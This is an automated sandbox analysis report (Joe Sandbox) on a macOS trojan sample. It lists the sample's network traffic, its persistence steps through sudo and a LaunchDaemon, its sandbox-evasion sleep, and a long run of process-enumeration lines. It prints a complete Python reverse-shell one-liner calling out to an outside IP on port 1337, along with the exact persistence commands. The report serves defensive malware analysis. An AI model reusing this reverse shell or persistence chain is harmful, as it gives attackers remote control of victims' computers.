Analysis Report

Overview

General Information

Joe Sandbox Version: 23.0.0
Analysis ID: 56289
Start time: 07:35:59
Joe Sandbox Product: Cloud
Start date: 03.07.2018
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: g70Ei8kMg7
Cookbook file name: defaultmacfilecookbook.jbs
Analysis system description: Mac Mini, High Sierra 10.13.2 (MS Office 16.9, Java 1.8.0_25)
Detection: MAL
Classification: mal60.troj.expl.mac@0/3@0/0

Detection

Strategy: Threshold
Score: 60
Range: 0 - 100
Reporting: Report FP / FN
Detection: malicious

Classification

Signature Overview

Networking:

Detected TCP or UDP traffic on non-standard ports
Source: global traffic, TCP traffic: 192.168.0.50:49275 -> 185.243.115.230:1337
Connects to IPs without corresponding DNS lookups
Source: unknown, TCP traffic detected without corresponding DNS query: 185.243.115.230
Reads from file descriptors related to (network) sockets
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552), Reads from socket in process: data
URLs found in memory or binary data
Writes from file descriptors related to (network) sockets
Source: /bin/ps (PID: 555), Writes from socket in process: data
Source: /bin/ps (PID: 558), Writes from socket in process: data
Source: /bin/ps (PID: 561), Writes from socket in process: data
Source: /bin/ps (PID: 564), Writes from socket in process: data
Source: /bin/ps (PID: 567), Writes from socket in process: data
Source: /bin/ps (PID: 571), Writes from socket in process: data

System Summary:

Classification label
Source: classification engine, Classification label: mal60.troj.expl.mac@0/3@0/0

Persistence and Installation Behavior:

Executes the "sudo" command used to execute a command as another user
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 553), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chown root /tmp/script.sh
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 556), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chmod +x /tmp/script.sh
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 559), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/script.sh /var/root/
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 562), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# mv /tmp/com.startup.plist /Library/LaunchDaemons/
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 565), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# chown root /Library/LaunchDaemons/com.startup.plist
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 568), Sudo executable: /usr/bin/sudo -> /usr/bin/sudo -S -p #node-sudo-passwd# launchctl load -w /Library/LaunchDaemons/com.startup.plist
Executes commands using a shell command-line interpreter
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 555), Shell command executed: /bin/sh -c ps -eo pid,comm
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 558), Shell command executed: /bin/sh -c ps -eo pid,comm
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 561), Shell command executed: /bin/sh -c ps -eo pid,comm
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 564), Shell command executed: /bin/sh -c ps -eo pid,comm
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 567), Shell command executed: /bin/sh -c ps -eo pid,comm
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 571), Shell command executed: /bin/sh -c ps -eo pid,comm
Executes the "chmod" command used to modify permissions
Source: /usr/bin/sudo (PID: 557), Chmod executable: /bin/chmod -> chmod +x /tmp/script.sh
Executes the "chown" command used to modify ownership and group ownership
Source: /usr/bin/sudo (PID: 554), Chown executable: /usr/sbin/chown -> chown root /tmp/script.sh
Source: /usr/bin/sudo (PID: 566), Chown executable: /usr/sbin/chown -> chown root /Library/LaunchDaemons/com.startup.plist
Executes the "ps" command used to list the status of processes
Source: /bin/sh (PID: 555), Ps executable: /bin/ps -> ps -eo pid,comm
Source: /bin/sh (PID: 558), Ps executable: /bin/ps -> ps -eo pid,comm
Source: /bin/sh (PID: 561), Ps executable: /bin/ps -> ps -eo pid,comm
Source: /bin/sh (PID: 564), Ps executable: /bin/ps -> ps -eo pid,comm
Source: /bin/sh (PID: 567), Ps executable: /bin/ps -> ps -eo pid,comm
Source: /bin/sh (PID: 571), Ps executable: /bin/ps -> ps -eo pid,comm
Executes the "python" command used to interpret Python scripts
Source: /bin/bash (PID: 572), Python executable: /usr/bin/python -> python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])
Source: /bin/bash (PID: 574), Python executable: /usr/bin/python -> python -c import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('185.243.115.230',1337)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i'])
Explicitly loads/starts launch services
Source: /usr/bin/sudo (PID: 569), Launch agent/daemon loaded: launchctl load -w /Library/LaunchDaemons/com.startup.plist
Writes shell script files to disk
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552), Shell script file created: /private/tmp/script.sh
Reads data from the local random generator
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552), Random device file read: /dev/urandom
Sample contains user paths that might be useful for attribution
Source: initial sample, String containing user path: /Users/zeit/pkg-fetch/precompile/node/out/Release/obj/gen/src/inspector/protocol/Protocol.cpp
Source: initial sample, String containing user path: /Users/zeit/pkg-fetch/precompile/node/out/Release/obj/gen/node_javascript.cc
Uses the Python framework
Source: /usr/bin/python (PID: 572), Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Source: /usr/bin/python (PID: 574), Python framework application: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
Writes property list (.plist) files to disk
Source: /Users/henry/Desktop/g70Ei8kMg7 (PID: 552), XML plist file created: /private/tmp/com.startup.plist

Boot Survival:

Creates memory-persistent launch services
Source: /bin/mv (PID: 563), Launch agent/daemon created with KeepAlive and/or RunAtLoad, file moved: /tmp/com.startup.plist -> /Library/LaunchDaemons/com.startup.plist
Creates system-wide 'launchd' managed services aka launch daemons
Source: /bin/mv (PID: 563), Launch daemon created, file moved: /tmp/com.startup.plist -> /Library/LaunchDaemons/com.startup.plist

Malware Analysis System Evasion:

Executes the "sleep" command used to delay execution and potentially evade sandboxes
Source: /bin/bash (PID: 573), Sleep executable: /bin/sleep -> sleep 5
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: g70Ei8kMg7, Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE

Language, Device and Operating System Detection:

Reads process information of other processes
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.253 -> queries PID 253Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.251 -> queries PID 251Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.250 -> queries PID 250Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.249 -> queries PID 249Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.248 -> queries PID 248Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.246 -> queries PID 246Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.245 -> queries PID 245Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.237 -> queries PID 237Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.235 -> queries PID 235Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.234 -> queries PID 234Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.231 -> queries PID 231Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.230 -> queries PID 230Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.228 -> queries PID 228Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.225 -> queries PID 225Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.222 -> queries PID 222Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.215 -> queries PID 215Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.214 -> queries PID 214Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.213 -> queries PID 213Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.212 -> queries PID 212Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.209 -> queries PID 209Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.208 -> queries PID 208Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.206 -> queries PID 206Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.205 -> queries PID 205Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.204 -> queries PID 204Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.203 -> queries PID 203Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.201 -> queries PID 201Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.200 -> queries PID 200Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.199 -> queries PID 199Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.197 -> queries PID 197Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.196 -> queries PID 196Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.195 -> queries PID 195Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.193 -> queries PID 193Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.192 -> queries PID 192Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.191 -> queries PID 191Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.190 -> queries PID 190Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.189 -> queries PID 189Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.188 -> queries PID 188Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.179 -> queries PID 179Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.175 -> queries PID 175Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.171 -> queries PID 171Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.170 -> queries PID 170Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.167 -> queries PID 167Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.161 -> queries PID 161Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.160 -> queries PID 160Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.158 -> queries PID 158Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.156 -> queries PID 156Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.155 -> queries PID 155Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.153 -> queries PID 153Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.151 -> queries PID 151Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.121 -> queries PID 121Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.120 -> queries PID 120Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.119 -> queries PID 119Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.118 -> queries PID 118Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.114 -> queries PID 114Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.113 -> queries PID 113Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.112 -> queries PID 112Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.111 -> queries PID 111Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.110 -> queries PID 110Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.109 -> queries PID 109Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.108 -> queries PID 108Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.106 -> queries PID 106Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.105 -> queries PID 105Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.104 -> queries PID 104Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.103 -> queries PID 103Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.101 -> queries PID 101Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.98 -> queries PID 98Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.97 -> queries PID 97Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.95 -> queries PID 95Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.94 -> queries PID 94Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.93 -> queries PID 93Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.92 -> queries PID 92Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.91 -> queries PID 91Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.90 -> queries PID 90Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.89 -> queries PID 89Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.87 -> queries PID 87Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.84 -> queries PID 84Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.83 -> queries PID 83Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.81 -> queries PID 81Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.80 -> queries PID 80Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.79 -> queries PID 79Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.74 -> queries PID 74Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.73 -> queries PID 73Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.70 -> queries PID 70Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.69 -> queries PID 69Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.67 -> queries PID 67Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.66 -> queries PID 66Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.65 -> queries PID 65Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.64 -> queries PID 64Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.62 -> queries PID 62Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.60 -> queries PID 60Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.58 -> queries PID 58Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.57 -> queries PID 57Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.56 -> queries PID 56Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.54 -> queries PID 54Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.53 -> queries PID 53Jump to behavior
Source: /bin/ps (PID: 555)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.1 -> queries PID 1Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.552 -> queries PID 552Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.549 -> queries PID 549Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.547 -> queries PID 547Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.543 -> queries PID 543Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.541 -> queries PID 541Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.540 -> queries PID 540Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.515 -> queries PID 515Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.513 -> queries PID 513Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.512 -> queries PID 512Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.510 -> queries PID 510Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.509 -> queries PID 509Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.473 -> queries PID 473Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.465 -> queries PID 465Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.456 -> queries PID 456Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.430 -> queries PID 430Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.429 -> queries PID 429Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.428 -> queries PID 428Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.427 -> queries PID 427Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.426 -> queries PID 426Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.425 -> queries PID 425Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.424 -> queries PID 424Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.419 -> queries PID 419Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.418 -> queries PID 418Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.414 -> queries PID 414Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.402 -> queries PID 402Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.399 -> queries PID 399Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.398 -> queries PID 398Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.397 -> queries PID 397Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.396 -> queries PID 396Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.395 -> queries PID 395Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.393 -> queries PID 393Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.392 -> queries PID 392Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.391 -> queries PID 391Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.388 -> queries PID 388Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.384 -> queries PID 384Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.383 -> queries PID 383Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.382 -> queries PID 382Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.381 -> queries PID 381Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.378 -> queries PID 378Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.377 -> queries PID 377Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.375 -> queries PID 375Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.373 -> queries PID 373Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.372 -> queries PID 372Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.371 -> queries PID 371Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.370 -> queries PID 370Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.366 -> queries PID 366Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.365 -> queries PID 365Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.364 -> queries PID 364Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.363 -> queries PID 363Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.362 -> queries PID 362Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.359 -> queries PID 359Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.357 -> queries PID 357Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.356 -> queries PID 356Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.355 -> queries PID 355Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.354 -> queries PID 354Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.353 -> queries PID 353Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.351 -> queries PID 351Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.350 -> queries PID 350Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.349 -> queries PID 349Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.347 -> queries PID 347Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.346 -> queries PID 346Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.345 -> queries PID 345Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.343 -> queries PID 343Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.342 -> queries PID 342Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.341 -> queries PID 341Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.340 -> queries PID 340Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.337 -> queries PID 337Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.336 -> queries PID 336Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.335 -> queries PID 335Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.327 -> queries PID 327Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.326 -> queries PID 326Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.325 -> queries PID 325Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.324 -> queries PID 324Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.323 -> queries PID 323Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.322 -> queries PID 322Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.321 -> queries PID 321Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.320 -> queries PID 320Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.319 -> queries PID 319Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.318 -> queries PID 318Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.317 -> queries PID 317Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.316 -> queries PID 316Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.315 -> queries PID 315Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.313 -> queries PID 313Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.311 -> queries PID 311Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.309 -> queries PID 309Jump to behavior
Source: /bin/ps (PID: 558)Sysctl requested: kern.procargs2 (1.49) only found for 1.49.308 -> queries PID 308Jump to behavior
